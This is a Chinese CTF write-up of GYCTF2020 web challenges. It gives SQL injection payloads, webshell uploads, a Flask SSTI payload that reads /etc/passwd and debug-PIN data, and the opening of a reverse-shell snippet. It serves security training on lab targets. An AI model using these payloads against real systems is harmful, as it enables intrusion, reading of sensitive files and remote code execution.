GYCTF2020Web题解
Web
简单的招聘系统
方法一
直接在登录界面进行注入
1 | -1' union select 1,(SELECT group_concat(flaaag) from flag),3,4,5# |
登录用户名即为flag
方法二
万能密码admin’#密码123进入后台,注入点在
1 | pages-blank.php?key=1 |
时间盲注可以得到flag
easysqli_copy
题目源码
1 | <?php |
考察知识点:
宽字节注入+堆叠注入+prepare预编译注入+时间盲注
prepare预编译注入用法
1 | set @a=0x{hex(payload)}; |
给出解题脚本
1 | # encoding = utf-8 |
参考文章
https://www.freebuf.com/articles/web/216336.html
ezupload
上传一句话木马,直接getshell,查看flag没有权限,直接执行/readflag可以读取flag
Ezsqli
简单fuzz发现and、or、join、insert、in、union select等关键词都被过滤
简单测试发现True 返回Hello Nu1L,False返回Hello
因为in被过滤,这里使用
1 | sys.schema_table_statistics_with_buffer |
给出跑表名的脚本
1 | # -*- coding: UTF-8 -*- |
得到表名为
1 | users233333333333333, f1ag_1s_h3r3_hhhhh |
采用无列名注入,给出脚本
1 | import requests |
得到flag
参考文章 https://blog.csdn.net/a3320315/article/details/104476566
盲注
给出源码
1 | <?php |
fuzz一波过滤了=、rlike、<>,但提示flag在fl4g里,所以采用正则注入
1 | import requests |
blacklist
改的强网杯的题
waf如下
1 | preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); |
查询数据库名
1 | 1';show databases; |
查询表名
1 | 1';show tables; |
查询列名
1 | 1';show columns from FlagHere; |
查询数据,因为select被过滤,所以使用handle
1 | 1'; handler FlagHere open as hack; handler hack read first; handler hack close; |
FlaskApp
参考文章 https://xz.aliyun.com/t/2553
读取/etc/passwd
1 | {{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}} |
得到
1 | root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/bin/false flaskweb:x:1000:1000::/home/flaskweb: |
读取machine-id
1 | {{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/proc/self/cgroup').read()}} |
得到
1 | 12:pids:/docker/ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a 11:cpu,cpuacct:/docker/ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a 10:hugetlb:/docker/ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a 9:devices:/docker/ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a 8:blkio:/docker/ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a 7:rdma:/ 6:memory:/docker/ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a 5:perf_event:/docker/ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a 4:net_cls,net_prio:/docker/ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a 3:freezer:/docker/ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a 2:cpuset:/docker/ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a 1:name=systemd:/docker/ef59c69d152dc41a33d4e816fd7cd936e2736b989ab6765665c6e2e43c4a918a 0::/system.slice/containerd.service |
获取Mac地址
1 | {{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/sys/class/net/eth0/address').read()}} |
得到
1 | 02:42:ac:12:00:05 |
随便输入使得路径报错
1 | /usr/local/lib/python3.7/site-packages/flask/app.py |
给出计算pin码的exp
1 | import hashlib |
运行得到pin码为
1 | 224-321-720 |
进入debug控制台
执行
1 | import os |
或者反弹shell
1 | import socket,subprocess,os; |
得到flag
easy_thinking
thinkphp6漏洞
注册一个账号,在登录的时候修改session为XXX.php(长度为32)
搜索内容输入一句话木马
连接
1 | http://host:port/untime/session/xxx.php |
可以getshell
禁用了很多函数,使用exp脚本
1 | <?php |
访问exp.php得到flag
本文链接: https://yd0ng.github.io/2020/02/25/i%E6%98%A5%E7%A7%8B%E6%96%B0%E6%98%A5%E6%88%98%E5%BD%B9%E5%85%AC%E7%9B%8A%E8%B5%9B%E5%A4%8D%E7%8E%B0/
版权声明: 本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。转载请注明出处!